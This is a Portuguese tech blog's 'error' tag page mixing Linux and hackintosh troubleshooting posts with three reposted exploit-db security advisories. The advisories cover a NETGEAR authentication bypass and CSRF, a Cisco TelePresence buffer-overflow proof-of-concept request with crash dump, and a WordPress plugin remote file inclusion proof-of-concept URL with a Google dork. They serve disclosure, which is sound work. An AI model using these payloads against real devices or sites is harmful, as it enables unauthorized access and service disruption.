Browsed by
Tag: error

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Depois de instalar tudo em seu servidor Centos (falo de ambiente lamp2 no centos), ao instalar o ioncube você percebe a mensagem de erro:

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so:  /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Calma, nem você é do mal e nem seu servidor, isso ocorre por que o SELinux está monitorando as coisas, permissões e etc, teremos de desativar o danado :(,

Para desativarmos o SELINUX devemos seguir os passos abaixo:

vim

Playing error : Sua instalação do GStreamer está com um plug-in faltando. at /usr/bin/../share/gmusicbrowser/gmusicbrowser_gstreamer-0.10.pm line 135.

Playing error : Sua instalação do GStreamer está com um plug-in faltando. at /usr/bin/../share/gmusicbrowser/gmusicbrowser_gstreamer-0.10.pm line 135.

Se essa é a mensagem de erro ao tentar tocar um arquivo MP3 junto ao seu Ubuntu/Xubuntu/Kubuntu, não chore e nem desanime, na verdade o que está rolando é a falta de plugins para stream de audio.
Para sanar isto basta abrir seu terminal e digitar:

sudo apt-get install ubuntu-restricted-extras -y

Serão baixados mais de 100mb de plugins, mas tudo bacana (mp3, flash, mp4, avi e etc…).

Depois disso é só alegria.

Abraços a todos ;P

Use of uninitialized value in string ne at /usr/sbin/ddclient line 1973.

Use of uninitialized value in string ne at /usr/sbin/ddclient line 1973.

Se você está usando DEBIAN-BASED (mind/debian/ubuntu) e toda vez que roda o comando ddclient ele apresenta erro SEUS PROBLEMAS “SE ACABARAM-SE”!

Para sanar, como root faça o seguinte:

rm -rf /var/cache/ddclient/ddclient.cache

Depois rode o comando ddclient, a saída vai ser algo semelhante a:
SUCCESS:  updating SEUHOST.ALGUMACOISAg: good: IP address set to IPDASUAINTERFACEWEB

 

Abraços galera

Como atualizar seu Mac Os X Lion de forma simples

Como atualizar seu Mac Os X Lion de forma simples

Bom, pessoALL, estamos colocando esse simples artigo no ar para que possa ajudar pessoas que tem dúvidas/medo de atualizar seu Mac Os X (normalmente isso acontece com quem tem hackintosh).

Esta semana que passou publicamos um artigo sobre a estabilidade pós update do mac os x lion, você pode conferir aqui, o link mostra que não há problemas em atualizar seu hackintosh para 10.7.1 (caso esteja na 10.7.0).

Bom, este artigo vai mostrar como atualizar seu mac de forma MUITO simples.
Vamo que vamo?

Abrir updates do MAC OS X LION
Abrir updates do MAC OS X LION

Clicando no menu principal (Aquela mação linda que fica no canto esquerdo superior do seu Desktop (Apple chama o trem de mesa, pode? [lol])

Feito isto, clicando em ATUALIZAÇÃO DO SOFTWARE ele vai abrir aquela caixa de diálogo central e irá fazer busca por update.

Lembre-se de estar conectado na internet com o Mac que você quer atualizar.

Assim que terminar a busca por updates a mesma caixa de diálogo vai mostrar o que precisa ser atualizado, veja abaixo:

Mostrar Detalhes
Mostrar Detalhes

Nós do AppUnix sempre gostamos de observar DETALHES da update (a Apple não vai roubar seu pc, lol, não precisa olhar), mas, se você for cabreiro pode clicar em detalhes.
No nosso caso só tinha 1 update disponível, a qual marcamos e instalamos numa boa, vejam:

Instalar updates marcadas
Instalar updates marcadas

Assim que clicar em Instalar 1 Item (se marcar mais vai ser exibido Instalar X itens). A Aparência da instalação é simples e mostra uma barra de progresso, veja as imagens abaixo:

Progresso de instalação das updates
Progresso de instalação das updates

Agora veremos a conclusão da update, veja abaixo:

Status de completo (update)
Status de completo (update)

Antes de concluirmos nosso arti queremos lhe notificar que algumas updates críticas (de segurança) requerem o reboot da máquina, se for uma tela aparecerá mandando reiniciar o PC, reinicie sem problemas.
Veja bem, se houver erro pós reboot poderá ocorrer a tela abaixo:

erro no hack
erro no mac

Se este tipo de erro ocorrer basta um simples reboot e o sistema de inicialização vai corrigir o erro de permissões/grupos informado acima.

RESSALTAMOS que em caso de ambientes Hackintosh tome muito cuidado com updates de firmware, pois elas podem ferrar seu ambiente e tchau mac :(.

Desejamos-lhes um excelente final de semana.
Se gostar do artigo dê share, recomende, comente…

Abração galera.
Att: Portal AppUNIX

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF


Sense of Security - Security Advisory - SOS-11-011

Release Date. 20-Sep-2011
Last Update. -
Vendor Notification Date. 22-Mar-2011
Product. NETGEAR Wireless Cable Modem Gateway
CG814WG
Affected versions. Hardware 1.03,
Software V3.9.26 R14 verified,
possibly others
Severity Rating. High
Impact. Authentication bypass,
Cross Site Request Forgery
Attack Vector. Remote without authentication
Solution Status. Upgrade to R15 (by contacting NETGEAR)
CVE reference. Not yet assigned

Details.
The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISP's
as customer premises equipment within Australia and abroad. It is a
centrally managed ISP solution whereby each ISP's devices run a
customised firmware and configuration changes and updates can be pushed
out as required.

Basic authentication is used as the primary and only authentication
mechanism for the administrator interface on the device. The basic
authentication can be bypassed by sending a valid POST request to the
device without sending any authentication header. The response from the
device sends the user to another page that requests basic
authentication, however at this point the request has already been
processed.

An example of attacks using the basic authentication bypass may include
changing the admin password or enabling the remote admin interface
(Internet facing).

Additionally, due to the lack of CSRF protection in the web application,
the bypass attack can be coupled with CSRF to have a victim enable the
remote admin interface to the Internet, where an attacker can then use
the bypass attack again across the remote admin interface to reset the
admin password and access the device. This attack is possible when
targeting a victim that is behind the NETGEAR device on the same segment
as the web administrator interface whom has browsed to a malicious site
containing the CSRF attack.

NETGEAR was notified of this vulnerability on 22 March 2011, but we
never received a response or acknowledgement of the issue or fix. Sense
of Security notified local ISP's and it was escalated by a local ISP
who worked with NETGEAR to develop and test an update. Sense of Security
was never provided an opportunity to validate the fixes in the latest
firmware version. Given the severity of the issue it would be prudent
for NETGEAR to notify and supply an update to all of its customers.

Proof of Concept.
By embedding the below HTML in a website and having a
victim browse to the website the remote management interface to the
Internet would be enabled. An attacker could then use one of the
hardcoded passwords for the device to access it, or use a basic
authentication bypass to change the admin password. Alternatively, the
attacker could conduct a CSRF attack that implements two POST requests
to have the remote admin interface enabled, and the admin password
changed.

The example here is a basic proof of concept, more complex examples
which include JavaScript redirects to mask the basic authentication
pop-up would be more stealthy.








Solution.
Ask your ISP to obtain the latest firmware from NETGEAR and deploy it
to your device.

Discovered by.
Sense of Security Labs.

About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the country's largest
organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: [email protected]
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-011.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17874/

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010


Sense of Security - Security Advisory - SOS-11-010

Release Date. 19-Sep-2011
Last Update. -
Vendor Notification Date. 21-Feb-2011
Product. Cisco TelePresence Series
Platform. Cisco
Affected versions. C < = TC4.1.2, MXP <= F9.1 Severity Rating. Low - Medium Impact. Cookie/credential theft, impersonation, loss of confidentiality, client-side code execution, denial of service. Solution Status. Vendor patch References. 1. CVE-2011-2544 (CSCtq46488) 2. CVE-2011-2543 (CSCtq46496) 3. CVE-2011-2577 (CSCtq46500) Details. Cisco TelePresence is an umbrella term for Video Conferencing Hardware and Software, Infrastructure and Endpoints. The C & MXP Series are the Endpoints used on desks or in boardrooms to provide users with a termination point for Video Conferencing. 1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488): Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for managing, configuring and reporting. It is possible to set the Call ID (with H.323 or SIP) to a HTML value. If a call is made to another endpoint and an authenticated user browses to the web interface on the endpoint receiving the call (e.g. to view call statistics), the HTML will render locally within the context of the logged in user. From this point it is possible to make changes to the system as the authenticated user. The flaw is due to the flexibility of the H.323 ID or SIP Display Name fields and failure to correctly validate user input. Examples (MXP): Rebooting the system:
The attacker may also choose to change passwords in the system, disable
encryption or enable telnet:

2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496):
Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for
setting and getting configuration.

Example syntax is:
http://ip/getxml?location=/Configuration/Video
The request is sent to a locally listening shell (tshell). This is the
case for all requests relating to performing an action on the system (e.g.
config get or set). The shell then sends the input to the "main"
application (/app/main, id=0), and the data is passed as a parameter.

It was discovered that the getXML handle does not properly perform
length checking on the user supplied input before passing it to the
tshell. Furthermore, there is no length checking performed in the tshell
and no bounds checking performed in the main application where the
parameter is consumed. As such, it is possible to send input that
exceeds the size of the receiving buffer, subsequently causing an
invalid address to be read. This causes a reboot on the Endpoints. The
VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but
it will restart the process itself which drops all calls.

Proof of Concept: GET
/wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.1\r\n
Host: 192.168.6.99\r\n\r\n"

Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670
Illegal memory access at: 0x5858585c
Registers:
GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037
0f315580
GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896
0000000b
GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005
00000002
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002

As you can see, the crash string is passed as a parameter in GPR 8.
The severity of this issue is compounded by the fact that the main
application runs as root, this could potentially lead to arbitrary code
execution.

3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500):
Cisco TelePresence Endpoints utilise SIP for the call setup protocol.
Sending a SIP INVITE with a 4x8 a"s in the MAC Address field and the
receive field causes the system to reboot.

Proof of Concept: MXP:
Exception 0x1100 : Data TLB load miss Active task
FsmMain FSM process : SipTrnsp(0) FSM message : SipTrnsp_Send_Msg_Req
from SipTrnsp(0) Data TLB miss (DMISS) : 0x00000000 (illegal addr.
accessed)

Solution.
Upgrade to TC4.2 for the C series to fix validation issues.

Discovered by.
David Klein, Sense of Security Labs.

About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the countries largest
organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: [email protected]
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17871/

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion


# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('db_unx_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/

Como resolver problema | erro da AppStore no Hackintosh | Mac OS X Lion

Como resolver problema | erro da AppStore no Hackintosh | Mac OS X Lion

Olá galera tudo na paz?

Hoje galera vou dar possíveis soluções para um problema que pelo que vi após o aparecimento de um certo Leão que nossa querida Apple soltou por ai vem acontecendo com frequência….

“Your device or computer could not be verified.Contact support for assistance help”

Com Mac OS X Lion, simplismente todos os hardwares que mexi deram essa mensagem ao tentar baixar alguma coisa na app store, nesse artigo vou passar possíveis soluções para resolver tal problema…. Vou confessar a você fiquei quase uma semana tentando resolver esse problema…. tentei várias soluções que para mim não surtiram muito efeito…. vou passar todas e na ordem que acho mais plausível de serem tentadas…. Todas essas soluções envolvem a edição do arquivo com.apple.Boot.plist que fica dentro da pasta Extra na rais de seu HD, temos esse mesmo arquivo na pasta /Library/Preferences/SystemConfiguration, caso essas dicas não dêm certo pelo com.Boot.apple.plist da Extra aconselho a tentativa com com.Boot.apple.plist  do Library/Preferences/SystemConfiguration …. vamos lá então….

OBS: Você não conseguirá editar esse arquivo dentro da pasta Extra ou dentro da pasta /Library/Preferences/SystemConfiguration… será necessário a criação de uma cópia do mesmo em outro local…. por padrão eu crio na Mesa, mas fica a seu critério….

Outra coisa a se lembrar é que todas as dicas aqui postadas foram usadas tendo como bootloader o Chameleon 1020 HMBT, se você usa outro bootloader talvez não seja da mesma a sua solução, talvez até sejam a mesma solução, mas em arquivos de configuração diferentes….

Vamos lá, a primeira coisa a se tentar é, inserir EthernetBuiltIn=Yes no com.Boot.apple.plist, ficando assim

 

<key>EthernetBuiltIn</key>

<string>Yes</string>

 

Após cada tentativa é preciso reboot da máquina….

-Doooguinha não due certo par mim, continuo recebendo “Your device or computer could not be verified.Contact support for assistance help”

Vamos a segunda solução possível… no mesmo arquivo, inserir PCIRoot=0 ou PCIRoot=1, aconselho o Lizard para ficar mais fácil saber que binário utilizar…. Baixe-o aqui  ao executar o aplicativo, verá uma interface igual a essa

Lizard_00

 

Em PCIRoot clique no botão Auto-detect value receberá um alerta dizendo o valor correto a se usar

Lizard_01

 

Agora vá até seu com.Boot.apple.plist e insira da seguinte forma (ai vai depender do valor dado pelo Lizard, mas já posso adiantar que em meus casos deu sempre 0 quando coloquei 1 fiquei sem rede… fica a dica)

 

<key>PCIRoot</key>

<string>0</string>

 

*caso seu Lizard acuse o valor 0(zero)

 

<key>PCIRoot</key>

<string>1</string>

 

*casp seu Lizard acuse o valor 1(um)

 

Tente tbm utilizando os mesmo valores utilizando PCIRootUID=0 ou PCIRootUID=1, ficando

 

<key>PCIRootUID</key>

<string>0</string>

 

ou

 

<key>PCIRootUID</key>

<string>1</string>

 

Lembrando galera…. tem que ter persistência…. eu mesmo tentei todas as combinações possíveis nessas opções acima…. TODAS mesmo….. mas nem uma infelizmente deu certo pra mim…, agora vou dar de lambuja pra você a solução e acho que atenderá muita gente, vamos utilizar o OSXTools para tal…. baixe-o Aqui

Pra você que tem um ambiante parecido com o meu( Asus+Intel+Geforce+Lion subindo em 64Bits), no meu caso possuo uma GeForce 9800GT 1024MB 256bits… para ativação no Mac OS X Lion foi necessária apenas GraphicsEnabler=Yes. Agora para conseguir sanar nosso problema aconselho que utilize a NVEnabler64 (isso para minha primeira indicação de solução para o problema)…

Caso você tenha um ambiente parecido com o eu, faço o seguinte então…. instale essa kext NVEnabler64 utilizando Kext Wizard… após instalar… como de prache pesso que repare as permissões (faça utilizando o próprio Kext Wizard)….. beleza…. agora vamos ao OSXTools, ao executá-lo verá uma interface assim

OSXTools

 

Na parte de baixo do aplicativo verá Add EFI Strings/Boot Flag

OSXTools_1

 

Clique no mesmo e chegará a essa interface

OSXTools_2

 

Na parte superior da tela clique em Ethernet Strings

OSXTools_3

 

Chegará em uma tela onde o aplicativo já fez tudo pra você….

OSXTools_4

 

Utilizaremos somente esse código Hexadecimal em nossa solução

OSXTools_5

 

Copie-o para a área de tranferência

OSXTools_6

 

utilize-o no com.Boot.apple.plist da seguinte forma

 

 <key>EthernetBuiltIn</key>

<string>Yes</string>

<key>device-properties</key>

<string>4b00000001000000010000003f000000010000

0002010c00d041030a0000000001010600011c01010600

00007fff0400160000006200750069006c0074002d0069

006e0000000500000001</string>

 

Salve-o (caso precise, pois no Lion tem autosave e você não precisará salvá-lo manualmente), substitua o com.Boot.apple.plist de dentro da pasta Extra ou da pasta /Library/Preferences/SystemConfiguration…. reboot  e pronto… já pode usar seu AppStore até se cansar…. eu vou ser sincero…. só queria conseguir utilizar o AppStore porque estou começando a mexer com desenvolviemnto para  Mac OS | iOS ai ficar baixando essas coisa de lugares inseguro não dá né galera…. mas beleza…. ai você deve estar se perguntando…. Doooguinha, meu vídeo só funciona com String de vídeo… como irei fazer se o divice-properties já está utilizando a string da Ethernet…. calma meu caro… eu te falo….

Primeiro gere a string de vídeo com o programa de sua preferência, aqui utilizo para vídeo sempre o EFI Studio, que tem essa cara…

EFI

 

Selecione sua placa de vídeo na Lista

EFI_1

 

Clique em Add Device

EFI_2

 

Na tela seguinte clique no canto inferior direito em Save Hex

EFI_3

 

Será solicitado local para salvamento do arquivo, faça como preferir

EFI_4

 

Agora você já pode fechar o EFI Studio (ou outro qualquer que esteja usando)…. Vamos ao OSXTools… naquela tela que pegamos a string de Ethernet

Ethernet_String

 

Na parte superior dessa tela clique em Save as Hex

Ethernet_string_1

 

Será solicitado um nome

Ethernet_String_2

 

Um local onde salvar

Ethernet_String_3

 

Receberá mensagem de sucesso

Ethernet_String_4

 

Feche a tela da string de Ethernet voltando a essa tela

Combine_Hexa

 

No canto superior direito existe um Ícone Combine Hex Strings, clique nele

Combine_Hexa_1

 

Chegará nessa tela

Combine_Hexa_2

 

No canto superior esquerdo clicando em Chose Files você irá selecionar os Hexa decimais que você gerou referente a seus Hardwares

Combine_Hexa_3

 

Como puderam ver, meus Hexa Decimais foram salvos na Mesa

Comnie_Hexa_4

 

Agora escolha os Hexas (desculpem a quantidade de arquivos na Mesa, aquilo são screens Shot para fazer esse how to além de kexts para desenvolvimento de pacotes posteriores para facilitar a vida de vocês…..

Combine_Hexa_5

 

Podem ver na tela que ele gerou um Hexadecimal GIGANTE…. agora mescladno o Hexa do Vídeo e o Hexa da Ethernet…. bom, agora vamos pegar essa string copiar para a área de tranferência (Command+C)

Combine_Hexa_6

 

Agora vá até seu com.Boot.apple.plist e insira as seguintes linhas

<key>EthernetBuiltIn</key>

<string>Yes</string>

<key>device-properties</key>

<string>1004000001000000020000003f0000000100000002010
c00d041030a0000000001010600011c0101060000007fff04001600
00006200750069006c0074002d0069006e0000000500000001c5
0300001500000002010c00d041030a0000000001010600000101
01060000007fff04003a000000400032002c00680077007300650
06e0073006f0072002d0070006100720061006d0073002d007600
65007200730069006f006e00000008000000000000022200000
0400032002c006400650076006900630065005f0074007900700
065000000120000004e5644412c6770752d64696f64650e0000004
e00560050004d0000002000000001000000000000000000000
0000000000000000000000000000000001e00000072006f006
d002d007200650076006900730069006f006e00000009000000
3331373261100000004e00560043004100500000001800000004
000000000003000c0000000000000700000000220000004000
32002c002300730069007a0065002d00630065006c006c007300
0000080000000000000022000000400030002c006400650076
006900630065005f00740079007000650000000b000000646973
706c6179100000006d006f00640065006c0000001e0000004e564
9444941204765466f7263652039383030204754204546491400000
0400030002c006e0061006d0065000000120000004e5644412c4
46973706c61792d4120000000400032002c0063006f006d007000
61007400690062006c0065000000160000004e5644412c73656e7
36f722d706172656e7414000000400031002c006e0061006d00650
00000120000004e5644412c446973706c61792d421200000040003
2002c00720065006700000008000000000000021c0000006400
650076006900630065005f007400790070006500000010000000
4e5644412c4765466f72636520000000400031002c0063006f006d
00700061007400690062006c00650000000e0000004e5644412c
4e564d616326000000400032002c002300610064007200650073
0073002d00630065006c006c00730000000800000000000001
0e0000006e0061006d00650000000f0000004e5644412c506172
656e7422000000400031002c006400650076006900630065005f
00740079007000650000000b000000646973706c617920000000
400030002c0063006f006d00700061007400690062006c006500
00000e0000004e5644412c4e564d6163220000005600520041004
d002c0074006f00740061006c00730069007a006500000008000
0000000004036000000400032002c0068007700630074007200
6c002d0070006100720061006d0073002d007600650072007300
69006f006e000000080000000000000214000000400032002c0
06e0061006d00650000001100000073656e736f722d706172656e74

</string>

**Pra não ficar desconfigurado no BLOG precisei fazer ajustes manuais na String… mas usem de acordo com o resultado obtido por ai….

Salve, substituia o com.Boot.apple.plist da pasta Extra ou de Library/Preferences/SystemConfiguration, reinicie sua máquina e faça o teste para ver se está tudo dentro do que nosso how-to lhe propôe… que é conseguir utilizar AppStore em seu Hackintosh… Outra coisa…. tbm existe uma solução no site da própria apple que é a de Excluir o arquivo NetworkInterfaces.plist da pasta Library/Preferences/SystemConfiguration …. mas essa só aconselho se você tiver um pouco de conhecimeno para adicionar novamente as interfaces de rede…. pois com a exclusão desse arquivo você ficará sem interfaces de rede disponíveis lá em preferências do Sitema e consequentemente terá que adicionar todas na mão…. ai fica a seu critério…. fazer ou não vai depender do seu conhecimento para reverter o que a exclusão desse aquivo acarretará…. É isso galera espero que ajude a vocês…. sofri muuito com essa besteira e espera sinceramente que nossos leitores não tenham o mesmo problema que tive….

Espero que dentre as soluções proposta para sanar esse problema você consiga resolver o seu…. Caso não… infelizmente eu não sei como fazer…. Só pra constar nos Autos, essa solução tbm fez com que minha Wireless conseguisse acesso ao AppStore, portanto tornou-se uma solução completa….. resolveu por completo meu problema……Caso tenha dúvida de como inserir essas linhas na qual vou citando aqui… vou deixar para download meu com.Boot.apple.plist… ai é só abrir e verificar como ficou….

Baixe Aqui

Lembrando que utilizei somente string para Ethernet e para vídeo utilizei a kext NVEnabler64

Bom proveito galera…. abraço!!!!!! :D

Gostou? Comente, complemente e espalhe!

 

Device: /dev/hda, 1 Currently unreadable (pending)

Device: /dev/hda, 1 Currently unreadable (pending)

Se você está recebendo a mensagem no seu arquivo /var/log/messages:

Device: /dev/hda, 1 Currently unreadable (pending)

Podendo ser /dev/sdb ou qualquer outra indicação de disco saiba que o hd em questão está “pensando em ir para o saco”, por isso, já mantenha um de reserva.
E se isto é por parte de um idc, solicite a troca de disco imediatamente.